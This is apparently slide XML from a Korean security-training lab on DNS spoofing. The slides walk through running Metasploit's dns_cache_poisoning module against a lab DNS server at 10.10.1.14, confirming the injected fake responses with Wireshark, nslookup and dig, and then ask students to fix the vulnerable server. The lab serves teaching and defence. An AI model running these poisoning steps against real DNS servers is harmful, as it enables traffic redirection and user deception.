                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E7C0E58-0353-456E-ACDB-61AF1BF57C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14517" y="3484743"/>
            <a:ext cx="5376985" cy="395604"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Picture 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1E5C108-18AC-4D52-B6E8-E7368C80E3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55930" y="4806406"/>
            <a:ext cx="4508627" cy="362712"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27507999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화살표: 오른쪽 8">
            <a:hlinkClick r:id="" action="ppaction://noaction"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36DC0363-5748-4238-A24E-3E0F461FCB92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="134367" y="97585"/>
            <a:ext cx="257755" cy="206099"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 73148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2DF244-1E45-44A0-B32E-616FEC167CD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="392122" y="368998"/>
            <a:ext cx="5616792" cy="6120000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en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> auxiliary(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>dns_cache_poisoning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>) &gt; SET XIDS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>주입할응답수</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>10) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 이용한 패킷 캡처 시작 및 공격 실행</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> auxiliary(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>dns_cache_poisoning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>) &gt; run</a:t>
            </a:r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r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>11) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 통해 공격 수행 과정 및 성공 확인</a:t>
            </a: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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>※ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>공격 모듈에 의해 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>질의가 공격 대상 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서버로 전송됨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B02FE9C-319E-4A1A-B3F6-06CCEB53FD1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183088" y="368998"/>
            <a:ext cx="5616792" cy="6120000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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>※ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>공격 모듈에 의해 다수의 가짜 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>응답들이 주입됨</a:t>
            </a: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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>※ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>공격 성공 확인</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서버가 공격 모듈에서 주입한 가짜 응답을 받아들임</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000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4C33198-2E58-4A38-8153-C72034623E33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11593737" y="6457890"/>
            <a:ext cx="678993" cy="400110"/>
            <a:chOff x="10627762" y="-30288"/>
            <a:chExt cx="597159" cy="400110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1BD440D7-A4B6-422E-BEF0-DA734161F7A3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10675841" y="11905"/>
              <a:ext cx="464911" cy="338139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C45BEB1-A639-4FC8-BFA8-B46B8EC4E337}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10627762" y="-30288"/>
              <a:ext cx="5971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2">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>L I N K</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" alt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8" name="화살표: 오른쪽 7">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70F00BAB-BC11-49E5-AFFF-32BB961D8637}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="10773860" y="150995"/>
              <a:ext cx="251325" cy="187144"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 73148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" name="Picture 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2CB0AFE-FCF0-4204-9E35-5859167E8F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357" y="842130"/>
            <a:ext cx="3983101" cy="397637"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA737117-F3F9-46DB-843B-A2E38DEE89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921" y="2035582"/>
            <a:ext cx="4808220" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAA93EE2-D63D-4B70-8379-0A37D5E50E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498" y="3764904"/>
            <a:ext cx="5400040" cy="2312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23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F068D89E-FCCB-40A2-94DE-3F6F7FAFBF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8365" y="459434"/>
            <a:ext cx="5400040" cy="2312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25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F1D7EFE-14B4-41F0-A66D-15C3B834F3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48365" y="3074233"/>
            <a:ext cx="5400040" cy="308178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658229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화살표: 오른쪽 8">
            <a:hlinkClick r:id="" action="ppaction://noaction"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36DC0363-5748-4238-A24E-3E0F461FCB92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="134367" y="97585"/>
            <a:ext cx="257755" cy="206099"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 73148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2DF244-1E45-44A0-B32E-616FEC167CD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="392122" y="368998"/>
            <a:ext cx="5616792" cy="6120000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ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>12) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>nslookup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>또는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>dig </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>명령어로 공격 성공 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>nslookup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>호스트명</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>10.10.1.14</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># dig @10.10.1.14 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>호스트명</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" b="1" i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B02FE9C-319E-4A1A-B3F6-06CCEB53FD1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183088" y="368998"/>
            <a:ext cx="5616792" cy="6120000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en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>1) check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>및 오염시킨 호스트명 입력</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>acheck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>호스트명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4C33198-2E58-4A38-8153-C72034623E33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11593737" y="6457890"/>
            <a:ext cx="678993" cy="400110"/>
            <a:chOff x="10627762" y="-30288"/>
            <a:chExt cx="597159" cy="400110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1BD440D7-A4B6-422E-BEF0-DA734161F7A3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10675841" y="11905"/>
              <a:ext cx="464911" cy="338139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C45BEB1-A639-4FC8-BFA8-B46B8EC4E337}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10627762" y="-30288"/>
              <a:ext cx="5971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2">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>L I N K</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" alt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8" name="화살표: 오른쪽 7">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70F00BAB-BC11-49E5-AFFF-32BB961D8637}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="10773860" y="150995"/>
              <a:ext cx="251325" cy="187144"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 73148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" name="Picture 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3075A40A-4F63-4F40-A3AB-721CD56A4D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9877" y="1217687"/>
            <a:ext cx="3204083" cy="120865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FC8BCBD3-B8EB-48B1-B0E8-42FEF5CCA089}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="598914" y="2615860"/>
          <a:ext cx="5328158" cy="2442655"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5328158">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2820359432"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="237436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참고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13906924"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="2135083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※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칼리에서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DNS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서버를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10.10.1.14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지정하면 웹 브라우저를 통해 확인 가능</a:t>
                      </a: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68517656"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4097" name="_x762563712">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F32DD471-B532-4825-93E5-E7DEF111D6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676" y="3126920"/>
            <a:ext cx="5204633" cy="1834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2021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">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3010DBED-3ABA-4169-8A96-F92BD8C53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sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/Training/Unit/Net/11</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 11. DNS Spoofing -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>대응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6A2CC12-A97B-4DB5-936F-E7C75CBB4AA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1496053" y="3328503"/>
            <a:ext cx="4432683" cy="2833758"/>
          </a:xfrm>
          <a:prstGeom prst="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ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="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대응</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="2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실습</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" b="1" kern="0" spc="200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="7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로컬 네트워크의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DNS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서버가 구형이라</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000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DNS Cache Poisoning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공격에 취약한 것으로 보고되고 있다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  <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="10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취약점을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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보완하시오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000" dirty="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9A933898-9CDB-4360-99A0-123577882146}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="580444" y="3328504"/>
            <a:ext cx="730420" cy="730420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1">
                    <a:lumMod val="75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5400000" scaled="1"/>
            </a:gra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gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:schemeClr val="accent6">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="88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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
